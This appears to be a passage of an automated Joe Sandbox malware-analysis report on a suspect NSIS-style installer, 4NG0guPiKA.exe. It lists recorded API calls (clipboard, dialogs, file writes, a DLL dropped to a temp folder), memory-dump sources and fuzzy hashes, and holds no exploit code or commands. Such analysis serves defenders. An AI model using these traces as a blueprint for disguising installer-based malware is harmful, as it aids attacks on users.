• GetDlgItem.USER32(?,000003EC), ref: 00405443
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
• GetDlgItem.USER32(?,000003F8), ref: 00405350
  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
• GetDlgItem.USER32(?,000003EC), ref: 00405495
• CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
• CloseHandle.KERNEL32(00000000), ref: 004054AA
• ShowWindow.USER32(00000000), ref: 004054CE
• ShowWindow.USER32(?,00000008), ref: 004054D3
• ShowWindow.USER32(00000008), ref: 0040551D
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
• CreatePopupMenu.USER32 ref: 00405562
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
• GetWindowRect.USER32(?,?), ref: 00405596
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
• OpenClipboard.USER32(00000000), ref: 004055F7
• EmptyClipboard.USER32 ref: 004055FD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
• GlobalLock.KERNEL32(00000000), ref: 00405613
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
• GlobalUnlock.KERNEL32(00000000), ref: 00405647
• SetClipboardData.USER32(0000000D,00000000), ref: 00405652
• CloseClipboard.USER32 ref: 00405658
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
• Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404619
• SetWindowTextW.USER32(00000000,?), ref: 00404643
• SHBrowseForFolderW.SHELL32(?), ref: 004046F4
• CoTaskMemFree.OLE32(00000000), ref: 004046FF
• lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
• lstrcatW.KERNEL32(?,Call), ref: 0040473D
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
  • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061E1
  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
  • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061F5
  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00406208
• GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
• SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
Strings
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
• API String ID: 2246997448-2514212979
• Opcode ID: 93a521dd52dbb562047e66d8ed4f73cc22a9918706a58848e32179005cd4fe03
• Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
• Opcode Fuzzy Hash: 93a521dd52dbb562047e66d8ed4f73cc22a9918706a58848e32179005cd4fe03
• Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
• Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
• Opcode Fuzzy Hash: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
• Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
APIs
• lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
• GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
• GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
• wsprintfA.USER32 ref: 00405C80
• GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
• GlobalFree.KERNEL32(00000000), ref: 00405D71
• CloseHandle.KERNEL32(00000000), ref: 00405D78
  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405B5A
  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Strings
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %ls=%ls$NUL$[Rename]$p]B$peB
• API String ID: 1265525490-3322868524
• Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
• Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                            • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                            • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                            • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040439B
                                                                                                            • GetSysColor.USER32(?), ref: 004043AC
                                                                                                            • SendMessageW.USER32(00000000,00000443,?,?), ref: 004043BA
                                                                                                            • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004043C8
                                                                                                            • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004043CD
                                                                                                            • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004043DA
                                                                                                            • SendMessageW.USER32(00000000,00000449,?,?), ref: 004043EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ButtonCheckColorItemlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1008850623-0
                                                                                                            • Opcode ID: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
                                                                                                            • Instruction ID: 6404b5b34e5ce3e62085b934271d78e479a703510769b93e2f3efd78726f1448
                                                                                                            • Opcode Fuzzy Hash: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
                                                                                                            • Instruction Fuzzy Hash: D331A0B1A00109BFDB01AF64DD85A7D3BA9FB44744F00407AFA05FB2A0D7799E62DB58
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                            • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                            • String ID: @H1v
                                                                                                            • API String ID: 3579998418-3152185570
                                                                                                            • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                            • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                            • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                            • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061E1
                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061F5
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00406208
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-3100106079
                                                                                                            • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                            • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                            • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                            • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                            • String ID: 8$C:\Users\user\AppData\Local\Temp\nso68A0.tmp$C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll
                                                                                                            • API String ID: 1453599865-2630244177
                                                                                                            • Opcode ID: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                            • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                            • Opcode Fuzzy Hash: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                            • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                            • GetSysColor.USER32(?), ref: 004041FA
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                            • DeleteObject.GDI32(?), ref: 00404224
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                            • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                            • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
APIs
• lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
• lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
• lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
• SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
• Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
• Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
• Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402D35
• GetTickCount.KERNEL32 ref: 00402D53
• wsprintfW.USER32 ref: 00402D81
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
• ShowWindow.USER32(00000000,00000005), ref: 00402DB3
  • Part of subcall function 00402CFE: MulDiv.KERNEL32(000264EC,00000064,000275F8), ref: 00402D13
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
